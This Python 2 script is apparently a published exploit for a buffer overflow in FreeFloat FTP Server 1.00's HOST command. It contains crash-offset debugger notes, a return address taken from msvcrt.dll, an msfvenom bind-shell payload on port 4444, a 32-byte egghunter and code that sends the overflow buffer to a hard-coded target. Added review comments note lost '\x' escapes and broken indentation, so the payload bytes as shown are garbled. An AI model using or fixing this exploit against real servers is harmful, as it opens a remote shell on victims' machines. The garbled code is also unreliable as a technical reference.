#!/usr/bin/python
# Exploit Title: FreeFloat FTP Server HOST Buffer Overflow (ASLR Bypass)
# Date: 11/05/2017
# Exploit Author: 1N3@CrowdShield - https://crowdshield
# Software Link: http://www.freefloat.com/software/freefloatftpserver.zip
# Version: 1.00
# Tested on: Windows Vista SP2 Ultimate x86 (ASLR Enabled/DEP disabled)
# CVE : N/A

import socket, time

# CONNECT TO HOST
# Target address and FTP control port from the author's lab setup (see the
# "Tested on" line in the header). Both are hard-coded; the script takes no
# command-line arguments.
host = "10.0.0.39"
port = 21

# [*] Exact match at offset 246
#buffer = "HOST " + "x41" * 246 + "x42" * 4 + "x43" * 745 + ' '

# AFTER CRASH
#EAX 00000408
#ECX 001FC700
#EDX 77C45E74 ntdll.KiFastSystemCallRet
#EBX 0000001A
#ESP 01C7FC00 ASCII "CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
#EBP 016D13F0
#ESI 0040A29E FTPServer.0040A29E
#EDI 016D1D1F ASCII "CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
#EIP 42424242

# !mona suggest
# 0BADF00D [+] Examining registers
# 0BADF00D EIP contains normal pattern : 0x41326941 (offset 246)
# 0BADF00D ESP (0x01d4fc00) points at offset 258 in normal pattern (length 742)
# 0BADF00D EDI (0x01741d24) points at offset 727 in normal pattern (length 273)

# CALL EDI - msvcrt.dll
#Found commands (All modules), item 5241
# Address=77D918F6
# Disassembly=CALL EDI
# Module Name=C:\Windows\system32\msvcrt.dll

# BIND SHELL
# msfvenom -p windows/shell_bind_tcp LPORT=4444 -f python -b "x0ax00x0d"
# Payload size: 355 bytes + 4 byte egg = 359 bytes
# Final size of python file: 1710 bytes
#
# Stage-two payload: the 8-byte egg marker "T00WT00W" (the 4-byte tag written
# twice; the same tag bytes 54 30 30 57 appear inside the egghunter string
# below) followed by the msfvenom-generated bind-shell stub described above.
# NOTE(review): in this copy of the file the "\x" escape prefixes appear to
# have been lost in transcription -- as written these are plain ASCII
# literals, and their length does not match the 359 bytes stated above.
bind_shell = "T00WT00W"
bind_shell += "xddxc2xbfx9axa8x28x21xd9x74x24xf4x5dx33"
bind_shell += "xc9xb1x53x31x7dx17x83xc5x04x03xe7xbbxca"
bind_shell += "xd4xebx54x88x17x13xa5xedx9exf6x94x2dxc4"
bind_shell += "x73x86x9dx8exd1x2bx55xc2xc1xb8x1bxcbxe6"
bind_shell += "x09x91x2dxc9x8ax8ax0ex48x09xd1x42xaax30"
bind_shell += "x1ax97xabx75x47x5axf9x2ex03xc9xedx5bx59"
bind_shell += "xd2x86x10x4fx52x7bxe0x6ex73x2ax7ax29x53"
bind_shell += "xcdxafx41xdaxd5xacx6cx94x6ex06x1ax27xa6"
bind_shell += "x56xe3x84x87x56x16xd4xc0x51xc9xa3x38xa2"
bind_shell += "x74xb4xffxd8xa2x31x1bx7ax20xe1xc7x7axe5"
bind_shell += "x74x8cx71x42xf2xcax95x55xd7x61xa1xdexd6"
bind_shell += "xa5x23xa4xfcx61x6fx7ex9cx30xd5xd1xa1x22"
bind_shell += "xb6x8ex07x29x5bxdax35x70x34x2fx74x8axc4"
bind_shell += "x27x0fxf9xf6xe8xbbx95xbax61x62x62xbcx5b"
bind_shell += "xd2xfcx43x64x23xd5x87x30x73x4dx21x39x18"
bind_shell += "x8dxcexecxb5x85x69x5fxa8x68xc9x0fx6cxc2"
bind_shell += "xa2x45x63x3dxd2x65xa9x56x7bx98x52x49x20"
bind_shell += "x15xb4x03xc8x73x6exbbx2axa0xa7x5cx54x82"
bind_shell += "x9fxcax1dxc4x18xf5x9dxc2x0ex61x16x01x8b"
bind_shell += "x90x29x0cxbbxc5xbexdax2axa4x5fxdax66x5e"
bind_shell += "xc3x49xedx9ex8ax71xbaxc9xdbx44xb3x9fxf1"
bind_shell += "xffx6dxbdx0bx99x56x05xd0x5ax58x84x95xe7"
bind_shell += "x7ex96x63xe7x3axc2x3bxbex94xbcxfdx68x57"
bind_shell += "x16x54xc6x31xfex21x24x82x78x2ex61x74x64"
bind_shell += "x9fxdcxc1x9bx10x89xc5xe4x4cx29x29x3fxd5"
bind_shell += "x59x60x1dx7cxf2x2dxf4x3cx9fxcdx23x02xa6"
bind_shell += "x4dxc1xfbx5dx4dxa0xfex1axc9x59x73x32xbc"
bind_shell += "x5dx20x33x95"

# 32 BYTE EGGHUNTER
# Stage one. Egghunter stubs conventionally scan memory for a marker and
# continue execution just past it; the marker bytes 54 30 30 57 ("T00W") are
# visible in this string and match the prefix of bind_shell above, which is
# presumably why the larger payload can sit anywhere in the buffer rather
# than at the point where execution lands -- confirm against the mona notes.
# Same transcription caveat as bind_shell: the "\x" prefixes appear to be
# missing in this copy.
egghunter = "x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74xefxb8x54x30x30x57x8bxfaxafx75xeaxafx75xe7xffxe7"

# CALL EDI - msvcrt.dll
# Value written over the saved return address (EIP was 42424242 in the crash
# dump above). It is the CALL EDI address 77D918F6 from the "Found commands"
# notes, written little-endian (F6 18 D9 77). Because the address is fixed,
# the exploit only works if msvcrt.dll is mapped at the same base on the
# target as on the author's Vista SP2 test box; the header's "ASLR Bypass"
# claim presumably rests on that module's placement -- not confirmed here.
# Same transcription caveat as above: the "\x" prefixes appear to be missing.
eip = "xF6x18xD9x77"

buffer = "HOST " + "x41" * 246 + eip + "x90" * 10 + bind_shell + "x90" * 241 + egghunter + ' '

try:
# NOTE(review): the indentation of the try body has been lost in this copy,
# so as written these lines are not valid Python; they are left byte-identical
# here. The file is also Python 2 syntax (print statements) throughout.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host,port))
# Read (and echo) the server banner before sending anything.
print sock.recv(1024)
# The timeout is applied only after connect() and recv() have already
# returned, so both of those calls block indefinitely if the server is silent.
sock.settimeout(10)

print "Sending buffer..."
print str(buffer)
# sendto() on an already-connected TCP socket: the address argument is
# redundant here (send() is the conventional call) and may be rejected on
# some platforms.
sock.sendto(buffer, (host, port))
print "Sent!"

# Bare except swallows every exception (KeyboardInterrupt included) and
# replaces the real error with one generic message, so a refused connection
# and a coding error in the block above are indistinguishable to the user.
except:
print "socket connection failed!"

# Pause briefly before exiting; the socket is never closed explicitly and is
# released only when the process ends.
time.sleep(1)

print "Done!"